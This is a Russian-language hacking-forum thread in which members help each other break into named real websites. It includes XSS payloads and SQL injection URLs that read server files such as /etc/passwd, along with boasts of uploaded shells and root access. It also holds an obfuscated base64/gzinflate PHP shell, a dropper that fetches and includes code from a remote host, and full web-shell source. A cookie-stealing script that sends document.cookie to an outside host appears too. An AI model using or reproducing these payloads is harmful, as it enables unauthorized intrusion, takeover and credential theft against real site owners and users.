после того как пытаешся зарег-тся под ником
"><script>alert("xss")</script>
скрипт проверяет его длину (от 4 до 20 символов).
если его длина не входит в рамки ограничений то выводит к примеру
ник $_POST['nick'](ему передано значение "><script>alert("xss")</script> и по этому вылазит окно.Там не стоит
htmlspecialchars()) имеет длину больше 20 символов.
>>Из кода ясно что переменная не передаеться не как POST не как GET
данные передаються методом POST
<form method="POST"
>>И что получаеться это и вовсе не уязвимость ?
уязвимость но с нее в данном случае толку 0

Я вобще тут никакой сложности не вижу
http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script>
прекрасно работает! :)

Всем здрасти...
Есть скул
При попытке проверить ее таким способом 10-1 (должна вывестить 9 новость)
Выводится 10 новость... Значит наврятли можно чего сделать, при попытке подставить ковычку это лезет:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2,3,4,5,6,7,8--' and pd.products_id = ''+union+select+1,2,3,4,5,6' at line 1

Выплеск запроса(оставил важное токо):where p.products_id = ''+union+select+1,2,3,4,5,6--' and pd.products_id = ''+union+select+1,2,3,4,5,6--' and pd.language_id = '2'

(1,2,3,4... мое, пробывал подобрать)(запрос был таким, id='+union+select+1,2,3,4,5,6--)

При заменне плюсеков на пробелы вылазиет след. ошибка:

1109 - Unknown table 'pd' in field list

(значит внедрение запроса по идее возможно)

Как тут быть? Скул в локалке. Пробывал разные комменты (--,/*, -- ) но не помогает

Может быть int();
Или жёсткая фильтрация.
Скорее всего 2.

Я вобще тут никакой сложности не вижу
http://ru.bigpoint.com/signup/?signUp=1&openId=&signUpUsername="><script src=http://www.site.ru/js.js></script>
прекрасно работает! :)
какой сложности?для тех кто в танке: я писал о том почему алерт вылазит,и предположил что данные принимаются постом.
но Пако капнул дальше и построив опрделеннный запрос опредилил что данные принимаются через REQUEST(ну или регистр глобалс).

Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo :)

Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo :)

я всё правильно делал,просто описался. ты хоть сам бы по пробовал залить прежде чем писать.

какая связка сплоитов щас актуальней?

nub-hacker

потом

пытаюсь открыть

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--

нифига не раб. помогите плиз.


почему не работает, как раз всё прекрасно в папку tmp залилось, что можнно проверить, пройдя по твоей последней ссылке:

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--

посмотреть сорцы страницы, CTRL+F "<?", и ты увидишь там свой "<?phpinfo();?>"

Просто сначала ты писал "читалка", а потом почему-то ждешь исполнения того, что загрузил. На самом деле через SQL-inj то, что загрузил - то просто сможешь также ПРОЧИТАТЬ.

Чтобы файло, загруженное через скулю заработало, его (файло) надо загружать в папку, доступную из веба (т.е. чтобы можно было набрать к нему путь в адресной строке браузера), но для этого необходимы 2 условия:

1. Знать полный абсолютный путь к серверу (а не просто /tmp, которая просто является фактическим тестом рабочести load_file). Папка "/tmp"Не всегда бывает доступна на запись, что часто многих начинающих сбивает с толку и они бросают такие скули.

2. Папка должна быть доступна на запись

ЗЫЖ Ну или как ты, в /tmp, но потом искать LFI, чтобы из этой /tmp проинклудить (читай - выполнить) твой phpinfo.php

:O мой пост и мою скуль крутишь ;)

1)load_file - это чтение исходного кода файла
2)+into+DUMPFILE+'/tmp/phpinfo.php'-- что бы это использовать надо иметь тебе инклуд

Pashkela, спасибо огромное, что так подробно разяснил. буду искать путь в web.

HAXTA4OK,спс за скулю. побольше бы рутовских ;)

P.S. вот тока ща зашел в эту тему прочел послед ваши посты и уже залил туда шелл
если не жалко то закройте тему с этой скулей :)

P.S.S

за 3 минуты мой рекорд :D нашел и путь и залил шелл

uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:initrc_t права taM

если не жалко то закройте тему с этой скулей
Нельзя так... Если ты успел - сразу закрывать, да?

P.S. вот тока ща зашел в эту тему прочел послед ваши посты и уже залил туда шелл
если не жалко то закройте тему с этой скулей :)

P.S.S

за 3 минуты мой рекорд :D нашел и путь и залил шелл

uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:initrc_t права taM


Давай путь. не жмись. мне в падлу Пашкелкин брутер путей юзать.

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/etc/httpd/conf/httpd.conf'),3,4,5,6,7,8,9--

ищи тута ;)

Ура. первый раз в жизни залил шелл через SQL. кстати там прав на запись нет. так что лейте шеллы, но деф не сделаеете )))

Давай путь. не жмись. мне в падлу Пашкелкин брутер путей юзать.


А он там и не прокатит, там каждый раз содержание запроса в сорцах есть, надо доделывать и под такие ситуации

а вот брутить иногда надо))то что я тебе дал путь , это чисто повезло что с 3 раза нашел конфиг файл))

Раз ушо на то пошло.
К теме nub-hacker
uid=0(root) gid=0(root) groups=48(apache) context=root:system_r:initrc_t
в /tmp лежит сплоит.

1 file_priv (возможность чтения/записи файлов)
Проверяется это так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
'имя юзера'- это имя того юзера под которым работает база, т.е. то, что выводится по запросу:
union+select+user()
но без хоста. Тоесть если вывело root@localhost, то юзер root
Значения два, либо "Y"-повезло, либо "N", соответственно неповезло
Можно не заморачиваться и сразу попробовать прочитать файл:
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user
если вывело, нужные привелегии у вашего юзера есть
Как я понял это для БД версии 4
А как проверить в 5-ой версии?

тоже самое, только на мой взгляд, чтобы не заморачиваться, правильнее делать так:

load_file(0x2f6574632f706173737764) - если linux

или

load_file(0x633a2f626f6f742e696e69) - если win

т.к. magic_quotes может быть ON.

ЗЫЖ
1. Пару раз встречал сайты, где значение file_priv в БД было N, а load_file работал
2. Если user() не root - это еще ничего не значит. Каждый 30-ый примерно все равно имеет file_priv=Y (т.е. проверять надо всех подряд, любую скулю)

Pashkela, спасбо.

load_file не хочет работать, ошибку выдает.
Можно ли как нибуть проверить , чтобы уточнить есть ли парва на чтение и запись файлов у юзера в БД 5 версии?
Ну чтобы выводило Y или N

SeNaP
Так как ты написал
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'

если маджики включены, то перевести в hex, а с лоад_файл это не вполне точный метод, бывают ньюансы


1. Пару раз встречал сайты, где значение file_priv в БД было N, а load_file работал

Это врятли

jokester:

Это врятли



http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,user()+from+mysql.user/*

Ответ: tltltl@info.umb.edu

http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*

Ответ: N

http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,load_file('/etc/passwd')/*

Ответ: содержимое /etc/passwd

---------------------------------------------------------------------------------------
Или еще может быть такая ситуация:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,file_priv,3,4,5,6+from+mysql.use r--

Ответ: Couldn't execute query

Но запрос:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,load_file('/etc/passwd'),3,4,5,6--

- положительный

Ну хз, может я чего не понимаю

По поводу пункта 1 пример:

http://www.kasparov.ru/subject.php?id=-74'+union+select+user()+from+mysql.user/*

Ответ: editor@192.168.1.70

http://www.kasparov.ru/subject.php?id=-74'+union+select+file_priv+from+mysql.user+where+u ser()='editor@192.168.1.70'/*

Ответ: Y

http://www.kasparov.ru/subject.php?id=-74'+union+select+load_file('/etc/httpd/conf/httpd.conf')/*

Ответ: содержимое /etc/httpd/conf/httpd.conf (в сорцах)

http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*

Звезды говорят о другом...

User name: tltltl@info.umb.edu
Fields user:password:file_Priv:host
[43]:tltltl:2e52490f15206ead:Y:%

Вот так
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user+ where+user='tltltl'/*

))) Ок, был неправ, погорячился:)))

Всегда надо юзать where user=, а лучше не заморачиваться и сразу load_file:)

Pashkela ты издеваешься что-ли?

Как по твоему что выводит этот запрос?
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*

Ааааа, я больше не буду:))) Просто большиство, насколько я знаю, where не пользуют, поэтому и привёл пример, для наглядности

Без where как раз это не имеет смысла делать. Непонятно что за запись тебе выдаст база.

Ну или хотя-бы concat_ws(0x3a,user,file_priv) а там уже искать своего юзера

select file_priv from mysql.user where user=substring_index(user(),0x40,1) and host=substring_index(user(),0x40,-1)

http://censor.net.ua/go/offer/ResourceID/12235-4.html
http://censor.net.ua/go/offer/ResourceID/12231.html
совпадают, то есть вроде как признак sql инъекции. Но более ничего не подтверждает это. Возможно ли тут запроса внедрение?

Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0

Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0
ftp
http://www.codenet.ru/webmast/php/PHP-Ftp.php
А здесь хорошо всё описывается.

Вот взял чужую пхп инъекцию http://forum.antichat.ru/showpost.php?p=1414940&postcount=940


Обясните мне плиз. я не понял каким он образом сформировал /etc/passwd

в этот бред. /cte/=htap_elif;dwssap=eman_elif

Мне надо понять, плиз.

ЗЫ. с меня +++

Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0

я так понял что ты залил '<?php eval($_GET[cmd]);?>' да? елси это так то пробуй залить локальный аплоад =)

/cte/=htap_elif;dwssap=eman_elif
/cte/ это /etc/ задом на перед
=htap_elif; просто чтобы было
dwssap это passwd наоборот
eman_elif чтобы было
другими словами
/cte/=htap_elif;dwssap=eman_elif это file_name=passwd;file_path=/etc/ только задом на перед

HAXTA4OK, как мне его залить? о_0 Все функции заливки запрещены. Удаленный инклюд не пашет.

так ты мне скажи что у тебя вообще щас там есть из твоего что ты залил?


P.S если щас речь про <php eval> то !

КАК ТЫ ЗАЛИВАЛ ЭТОТ ЕВАЛ КОД ЧЕРЕЗ into+outfile , точно так же , только вместо <php eval> лей форму локального аплоада!!!

Как можно залить файлы, если на сервере отключены wget, curl, get, lynx, links, fetch? о_0

Если етот вопрос касается заливки шелла, а не произвольных файлов, тогда предположим что у тебя уже есть возможность испольнения комманд, тогда:
echo '<? eval(gzinflate(base64_decode("7Vjbbts4EEVe8h2BozjhMk0kQbSsuE6AbhbtFujlISgK1K0QSZ RkrU15ZdcgV4n460tS8iW2rKQXbF/WDzZFzjk8MxwNSWt/mQjbFkNdd4ZiR7819RlCbtecOoZvWxnqDtHE0Wem7iI0VN0u6v ooc3Rm6hOEZl0TO0aA+obR0zLbwmhq6mnX/GoiAfYdHbs+EuYGM9HEtmaoi1Hgiv7U1AOEcNfst2yfhxHa37N 9kqTyl3s8IqjIoyBJCbMHWtkhRkLCE+hznrfJP4V33wGvAswJ5 m03ywmAcfnUAZxM+UCTvDqM/YRRwjt3Hk6DO9q+cC4vgCSjPIsI5AK5AMSUqpHf2u39vWGQZnA C4ViQtsdJ6EWZAT8TliY4OYavmZdEx/B3Et0T7sWihyaYtilh3lgvMdT7mxjwwsmn8/29RFLFQRQwA5701EeHctZ2SuKAJdwLsAFxgIk0NvzgnrBNSL9f AymwiFHkKVy7LdUPNOVZ2axiKtrKn+FIEXbAiak+QBGKx1KS8j 4WISRMtCC0eTIUMbrzUu53wHNhAIcBExN2gGwuyUp1QGEkilUt 2U6X7U2+i17vbAfhK/UBa9CHtHXkVV+ObBl+KMPfAQ5A9rDqWZC/eVP6+gwPaa6vf3/MKCehsckpWB8QrIK1ZWfBPKGU+6w4BAVOQgLbCRi0dGjVWQ80y SsUsprRbXnXBYM5YaFHqVh7anyfLC/9qYKiIE4ij2ffqSa/e4Kc1e9w/SEvMztnKtmt3M/l80AbaPDNi5dv4ZdPL69fv9vfO69qSQo78PxGDn18f1qId3XsR eT0w/tTHuY3crFOP+j7e94YHsqBGzL1KKeHS/SgNWjBiZJ5LmTfpB5ThJ+uP7rvT8VTovBymJEk2jXZciJpmBLK PazeZWlf0R6BgQaOFEtpFwd5thJy/AAnoqdsSOwHEHxZuJqzICaUGqAczZmH+Q2Dh5Wmh6i1cL19B93 rBxNIhjkkESWV9xVoPRP+CKD0Dy4kKsz+noUWCykXSWYIC6EMQ AfI5gWAoqT7QdoBeUA5gATHZUEOi4h7ecK4XG0WttOEJ7W51Fh RagB1dWStniyYupdnoKaQrLv8JxPbCVFu19NByIMqIMZm6tZUr i0NfalhF7Xt4bzg1fYlNYAqrotUA5Xwq8tdJLtlyBH2o8EbbsZ vPXjvVullbL7ePzc2coNbxEa+o2txgfdJVIjmjoL0xAloMQy95 RTlk7PkLtf/1yzBTvmpdw9F0R7hDmDeyOcAyflE7zfL3F6Ucn1/aXK9CsIwwal8/ciUxAUn/2GOxWFan2KqaC52C2El9oAfS7IleeXk/0n2uGeyX+4Y2+fGcqOpO0/u8rAcZqTZwGoaVWeVuErXoOBiwZvMy488oDzIo0Fr0oQ6F0bic EE583IaJdQndBOvN+HL3V6xVJmWHh0dyTMiaMStaqrEgkdmmTd KWDt8NIkUxxDhXhQtY7oQDB6bu2nYQtUBRpptm9Zm+lp1ulD1y un1uvCZPMipvF2dBurfiu3U3kzprVReh6yM18xEc3m5kxLEjbC 6JcobeKunTU0krujidj9EiDhG5Ka29RWJ6/9EXOkdfeYY/e+75fe0kWOIX4IkW+ymjh4KjEAz25qY6n8EJDGC1xEYjLr96Sw bYXLyBFGgp2HHmCN06+gjd4K6sdDh+raVosDU5Z8Mx8e9MM1Ot FiKFkRz27o10Rh1544+FQodY9zXe03Dz7/dg0Y+CMEjog/O+gd+nJ2kWfCUIHxqmu0zOPhyoP2sf3tAD89vRyetq8vW2SNOn LWeX7VA718="))); ?>' > shell.php
согласен с постом выше, всегда так делал, всегда прокатывало.

Кто вам вообще сказал, что у него шелл или инъекция? МБ он через SSH залить хочет, но все ф-ции заливки не работают.

Если етот вопрос касается заливки шелла, а не произвольных файлов, тогда предположим что у тебя уже есть возможность испольнения комманд, тогда:
echo '<? eval(gzinflate(base64_decode("7Vjbbts4EEVe8h2BozjhMk0kQbSsuE6AbhbtFujlISgK1K0QSZ RkrU15ZdcgV4n460tS8iW2rKQXbF/WDzZFzjk8MxwNSWt/mQjbFkNdd4ZiR7819RlCbtecOoZvWxnqDtHE0Wem7iI0VN0u6v ooc3Rm6hOEZl0TO0aA+obR0zLbwmhq6mnX/GoiAfYdHbs+EuYGM9HEtmaoi1Hgiv7U1AOEcNfst2yfhxHa37N 9kqTyl3s8IqjIoyBJCbMHWtkhRkLCE+hznrfJP4V33wGvAswJ5 m03ywmAcfnUAZxM+UCTvDqM/YRRwjt3Hk6DO9q+cC4vgCSjPIsI5AK5AMSUqpHf2u39vWGQZnA C4ViQtsdJ6EWZAT8TliY4OYavmZdEx/B3Et0T7sWihyaYtilh3lgvMdT7mxjwwsmn8/29RFLFQRQwA5701EeHctZ2SuKAJdwLsAFxgIk0NvzgnrBNSL9f AymwiFHkKVy7LdUPNOVZ2axiKtrKn+FIEXbAiak+QBGKx1KS8j 4WISRMtCC0eTIUMbrzUu53wHNhAIcBExN2gGwuyUp1QGEkilUt 2U6X7U2+i17vbAfhK/UBa9CHtHXkVV+ObBl+KMPfAQ5A9rDqWZC/eVP6+gwPaa6vf3/MKCehsckpWB8QrIK1ZWfBPKGU+6w4BAVOQgLbCRi0dGjVWQ80y SsUsprRbXnXBYM5YaFHqVh7anyfLC/9qYKiIE4ij2ffqSa/e4Kc1e9w/SEvMztnKtmt3M/l80AbaPDNi5dv4ZdPL69fv9vfO69qSQo78PxGDn18f1qId3XsR eT0w/tTHuY3crFOP+j7e94YHsqBGzL1KKeHS/SgNWjBiZJ5LmTfpB5ThJ+uP7rvT8VTovBymJEk2jXZciJpmBLK PazeZWlf0R6BgQaOFEtpFwd5thJy/AAnoqdsSOwHEHxZuJqzICaUGqAczZmH+Q2Dh5Wmh6i1cL19B93 rBxNIhjkkESWV9xVoPRP+CKD0Dy4kKsz+noUWCykXSWYIC6EMQ AfI5gWAoqT7QdoBeUA5gATHZUEOi4h7ecK4XG0WttOEJ7W51Fh RagB1dWStniyYupdnoKaQrLv8JxPbCVFu19NByIMqIMZm6tZUr i0NfalhF7Xt4bzg1fYlNYAqrotUA5Xwq8tdJLtlyBH2o8EbbsZ vPXjvVullbL7ePzc2coNbxEa+o2txgfdJVIjmjoL0xAloMQy95 RTlk7PkLtf/1yzBTvmpdw9F0R7hDmDeyOcAyflE7zfL3F6Ucn1/aXK9CsIwwal8/ciUxAUn/2GOxWFan2KqaC52C2El9oAfS7IleeXk/0n2uGeyX+4Y2+fGcqOpO0/u8rAcZqTZwGoaVWeVuErXoOBiwZvMy488oDzIo0Fr0oQ6F0bic EE583IaJdQndBOvN+HL3V6xVJmWHh0dyTMiaMStaqrEgkdmmTd KWDt8NIkUxxDhXhQtY7oQDB6bu2nYQtUBRpptm9Zm+lp1ulD1y un1uvCZPMipvF2dBurfiu3U3kzprVReh6yM18xEc3m5kxLEjbC 6JcobeKunTU0krujidj9EiDhG5Ka29RWJ6/9EXOkdfeYY/e+75fe0kWOIX4IkW+ymjh4KjEAz25qY6n8EJDGC1xEYjLr96Sw bYXLyBFGgp2HHmCN06+gjd4K6sdDh+raVosDU5Z8Mx8e9MM1Ot FiKFkRz27o10Rh1544+FQodY9zXe03Dz7/dg0Y+CMEjog/O+gd+nJ2kWfCUIHxqmu0zOPhyoP2sf3tAD89vRyetq8vW2SNOn LWeX7VA718="))); ?>' > shell.php
согласен с постом выше, всегда так делал, всегда прокатывало.

но ведь не всегда возможно такое протянуть через get запрос, размер данных не мал для гета...

Кто вам вообще сказал, что у него шелл или инъекция? МБ он через SSH залить хочет, но все ф-ции заливки не работают.

Ппц гуру, где твоя хакерская догадка, откуда он знает что нет качалок, в ssh не работает echo?, в ssh проще уже через ftp клиент подцепить его.

но ведь не всегда возможно такое протянуть через get запрос, размер данных не мал для гета...

Размер етого шелла- 3.8кб, ради интереса посмотрел, криптованый-1.9КБ, если что-то может помешать то ето Warning: gzinflate(), но ето бывает 2:10

Есть испольнения комманд и аплоадер файлов.

Выполняю команды через логи. Проверил все мне известные, нифига. Сейчас попробую то, что вы тут насоветывали ;)

откуда он знает что нет качалок
which wget... which lynx, etc...

твою ж мать =\
Fatal error: Call to undefined function: gzinflate() in
А без него разумеется не хочет...

ну праильно, судя по тому, что качалок нет - можно было понять что присутствие gzinflate маловероятно ))
лей обычный шелл.

в смысле лить обычный шелл? у меня есть LFI, нашел логи, там выполнял команды... в смысле лить обычный шелл? о_0

Tigger
allow_url_fopen on\off ?

copy() никто не отменял

Я еще пользовался такой фишкой, когда небыло качалок и удаленных инклудов:

<?php
if (isset($_GET[p]))
{
$f=fopen('/tmp/qwerty','w+');
fwrite($f,file_get_contents('http://www.youhost/upl.inc'));
}
include('/tmp/qwerty');
?>

Надеюсь понятно. залей на хост upl.inc, той что я тебе советол через echo, и етот скрипт через есho бросай на серв, дожно проканать=)

В том аплоадере просто хтмл код, нужно было закриптовать.., а так посредствами php можно будет стянуть и проинклудить локально.
shell.php?p

По теме, пускай буде, если вдруг кому нибудь пригодится. Больше ничем не могу помочь по даному вопросу.
upl.inc:

<html>
<head>
<title>uploader</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
<!--
body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px}
a { color: #000000; text-decoration: none}
a:hover { color: #000066; text-decoration: underline}
-->
</style>
</head>

<body bgcolor="#999999" text="#000000">
<center>
<table width="700" border="0" bgcolor="#000066">
<tr>
<td>
<table width="100%" border="0" bgcolor="#CCCCCC">
<tr>
<td>
<p><font size="2"><b><font color="#FF0000">&nbsp;&nbsp;&nbsp;System:
<font color="#000000">
<? passthru("uname -a"); ?>
</font><br>
&nbsp;&nbsp;&nbsp;Our permissions: <font color="#000000">
<? passthru("id"); ?>
</font><br>
&nbsp;&nbsp;&nbsp;Our locality: <font color="#000000">
<? passthru("pwd"); ?>
</font></font></b></font></p>

<pre>
<?php

// FILE UPLOAD
$uploaded = $_FILES['userfile']['tmp_name'];
if (file_exists($uploaded)) {
$pwd_dir = $_POST['dira'];
$real = $_FILES['userfile']['name'];
$destination = $pwd_dir."/".$real;
copy($uploaded, $destination);
echo "Uploaded process:";
print_r ($_FILES);
echo "FILE UPLOADED TO $destination";
} else {
echo "&nbsp;&nbsp;No file uploaded";
}
?> </pre> <form name="form1" method="post" enctype="multipart/form-data">
<table width="100%" border="0">
<tr>
<td width="35%"><font size="2"><b>&nbsp;&nbsp;Browse file
to upload:</b></font></td>
<td width="65%">
<input type="file" name="userfile" size="45">
</td>
</tr>
<tr>
<td width="35%"><b><font size="2">&nbsp;&nbsp;Destination:</font></b></td>
<td width="65%">
<input type="text" name="dira" size="45" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="upload">
</td>
</tr>
<tr>
<td width="35%">
<div align="right"> </div>
</td>
<td width="65%">&nbsp; </td>
</tr>
<tr>
<td width="35%"><b><font size="2">&nbsp;&nbsp;Command to execute:</font></b></td>
<td width="65%">
<input type="text" name="cmd" size="45" value="<? echo $_POST['cmd']; ?>">
<input type="submit" name="submit" value="execute">
</td>
</tr>
<tr>
<td width="35%">
<div align="right"> </div>
</td>
<td width="65%">&nbsp; </td>
</tr>
</table>
</form>
<p>
<pre>
<?
// command output
if ($_POST['cmd']){
$cmd = stripslashes($_POST['cmd']);
echo "$cmd executed...<br>";
passthru("$cmd");
}
else {
echo "No shell command executed";
}

?></pre>



<div align="right"> <font size="1"><b>2003 &copy; </b></font> </div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</body>
</html>

jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет...

Хулиган, тебя я немного не понял.

Заливай upl.inc на левый хост
Через echo заливай етот скрипт

<?php
if (isset($_GET[p]))
{
$f=fopen('/tmp/qwerty','w+');
fwrite($f,file_get_contents('http://www.левый-хост/upl.inc'));
}
include('/tmp/qwerty');
?>

потом
shell.php?p

есть админка, вроде самописная, так же имеется логин и пас к ней, но при попытке войти выдает что нельзя зайти с данного ip.
Вопрос как возможно обойти ето дрянь, можно ли подменить IP на IP администратора сайта

Экстрасенсов здесь нет. Мы не знаем каким способом проверяется IP. Если типа
#....
if($_SERVER['REMOTE_ADDR']==$trueip)
$welcome=true; else
$welcome=false;
#....Не подменить никак...
Ну а если включены регистер_глобался, т.е. ключ => значение массива $_GLOBALS будет равно названию => значению переменной, и IP берется с названия этой переменной, тогда просто в GET/POST/COOKIE подставь ip(название переменной)=0.0.0.0(админский IP).

Повторю, экстрасенсов здесь нет.

а как узнать как он проверяется?

а как узнать как он проверяется?Взглянуть в сорсы :)

jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет...


Так не бывает.
Давай сюда
1. Что прописано в логах (через что ты выполняешь комманды. КОД)
2. phpinfo() директивы
allow_url_fopen
allow_url_include
magic_quotes_gpc
safe_mode
disable_functions
3. ls -lia (ты-же как-то качалки искал, значит возможно)
4. Как ты пытаешься залить через copy (полностью)

Взглянуть в сорсы :)

Или методом тыка :) Попробуй подменить x_forwarder_for, хотя сейчас уже мало где проверяют так, но всё же... :)

В статье электа написано про то, что если в значение сессион ид вставить спецсимволы,то будет ошибка и раскрытие путей. Как защитится от этого? Спрашивал очень многих, никто ничего сказать не смог.

Фильтруй регулярками.

@session_start();

Вопрос:

Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.

Как же это замутить ))

Вопрос:

Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.

Как же это замутить ))

Уязвимости php 5.2 ?? :)

http://www.xakep.ru/vulnerability/PHP/

Вопрос:

Уязвимость возникает из-за ошибки в проверке входных данных в функции "imagerotate()". Атакующий может прочитать произвольные участки памяти.

Как же это замутить ))
http://milw0rm.com/exploits/7646

function affiliates_banners_edit_verify()
{
global $txt, $smcFunc, $sourcedir, $board_info, $board, $selected_boards;

// Check Permission for Admin and Affiliates Manager
if (!allowedTo('affiliates_manage'))
fatal_lang_error('affiliates_no_permission', false);

// We need an ID!!
if (empty($_REQUEST['id']))
fatal_lang_error('banners_no_selected', false);

// Check the banner
$bannerimage = htmlspecialchars($_REQUEST['bannerimage'], ENT_QUOTES);
$banner_id = $_REQUEST['id'];

if (empty($bannerimage))
fatal_lang_error('banner_no_image',false);

$smcFunc['db_query']('', "
UPDATE {db_prefix}affiliates_banners
SET image = '$bannerimage'
WHERE id_banner = $banner_id LIMIT 1");

// Please redirectme to the new banner
redirectexit('action=affiliates;sa=banners');
}
people,тут же есть вроде инъект,и как мне его с UPDATE реализовать?

P.S. просто уже мозг кипит

script.php?bannerimage=asd&id=1 and 1=(if(1=1,1,(select 1 union select 2)))
мож так, не проверял да и от многих факторов зависит

jokester
1) Выполнял запросы через /proc/self/environ. PHP код писал в User-Agent.
2) allow_url_fopen = 1
allow_url_include = в phpinfo его вообще нету
magic_quotes_gpc = 1
safe mode = 0
disable_functions = no value
3) ls -la пашет, проверил /tmp - все норм.
4) <? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?>
когла понял, что стоит мк, пробывал так:
<?php copy(base64_decode(blabla)); ?>
-----------------------------------------------------------

Мне Grey уже помог с шеллом, но нихуя не объяснил. Он залил как-то вручную через пакету, но не суть...

jokester, был бы рад услышать твой совет... )

P.S.
Я знаю, что в чем-то не прав =\

в User-Agent пропиши
<? copy('http://evilcod3.narod.ru/configs.php','/tmp/qqq.txt'); ?>
magic_quotes_gpc действует только на gpc те. на _REQUEST а на User-Agent не распространяется

Tigger

Если allow_url_include в phpinfo нет, то версия пыха, как я понимаю четвёртая. Тут будет работать и инклуд удалённый скорее всего, ну а copy() уж 100%.

Проблема только в кавычках. А вариантов масса. Я-же не зря спрашивал какой код ты пишешь. Именно КОД.
Одно дело если это например <? system($_GET[cmd]); ?> совсем другое если <?php eval($_REQUEST[ev]); ?> или например <?php include($_REQUEST[c]); ?> Туда ведь можно записать много чего, подумай, я думаю запросто найдёшь ещё парочку. :)

Я просто предполагаю, что Грей не просто так не объяснил, он любит по этой тематике задачки давать, поэтому фишек палить не буду, хотя они все в паблике, найдёшь без проблем

такое дело :

вывожу записи лимитом,движок сайта сабдример.
http://сайт.ру/catalog/index.php?category=-2+union+select+1,concat(0x3a,login,pass),3,4,5,6,7 +from+pmd_users+limit+1,0--

вылазит такое :
login1821165f4dcc3b5aa765d61d8327deb882cf99

меняется при изминении значения лимита только эта часть:

login1821165f4dcc3b5aa765d61d8327deb882cf99

вобщем что посоветуете?

после зелёного идёт MD5

после зелёного идёт MD5
это понятно что мд5,но эта часть во всех записях не меняется .

L I G A

Меняется окончание логина? Где разделитель-то?

или concat_ws(0x3a,login,pass) или concat(login,0x3a,pass), ты уж определись

concat_ws(0x3a,login,pass)
login363307:5f4dcc3b5aa765d61d8327deb882cf99
меняется:
login363307:5f4dcc3b5aa765d61d8327deb882cf99

наверно таки у них пароли одинаковые) будто бы какой-то неоригинальный реггер заюзали

Это чтото типа соли. токо для логина. короче лучше ставь себе этот двиг на машину и ковыряйся и разбирайся

Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
<? $query = $_SERVER['QUERY_STRING']; $query .= "\n"; $db="cookies.txt"; $fh=fopen ($db, "a+"); fputs ($fh, "$query"); fclose ($fh); ?>
что обозначают полученные данные, тоесть что приходит...?

Уязвимости php 5.2 ?? :)

http://www.xakep.ru/vulnerability/PHP/


Так точно,сержант Витя )У мя от нижеприведённого сплойта сознание уплывает)Ну что ж,попробую чтоли : Р

$_SERVER['QUERY_STRING']

Хакнул комп с помошбю последнего сплоита под мастдай. есть cmd.exe подскажите как залить мне файл туда. чтобы потом его выполнить или чтото подобное подскажите что можно с делать в моём случае

ЗЫ с меня +

Подскажите, на снифер приходят такого рода данные
com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH =25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11
благодаря xss на уязвимом сайте , тобиш тело письма такое
<script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script>
код снифа :
<? $query = $_SERVER['QUERY_STRING']; $query .= "\n"; $db="cookies.txt"; $fh=fopen ($db, "a+"); fputs ($fh, "$query"); fclose ($fh); ?>
что обозначают полученные данные, тоесть что приходит...?
:( это мой друг к тебе пришли куки (Ку́ки (слово не склоняется; от англ. cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. © ru.wikipedia.org)
Теперь твоя задача, подменить на полученные данные, свои. А сделать это можно следующим образом:

Mozilla Firefox - при помощи плагина: Add N Edit Cookies
Opera - следующей манипуляцией: "Инструменты -> Дополнительно -> Управление cookies..."

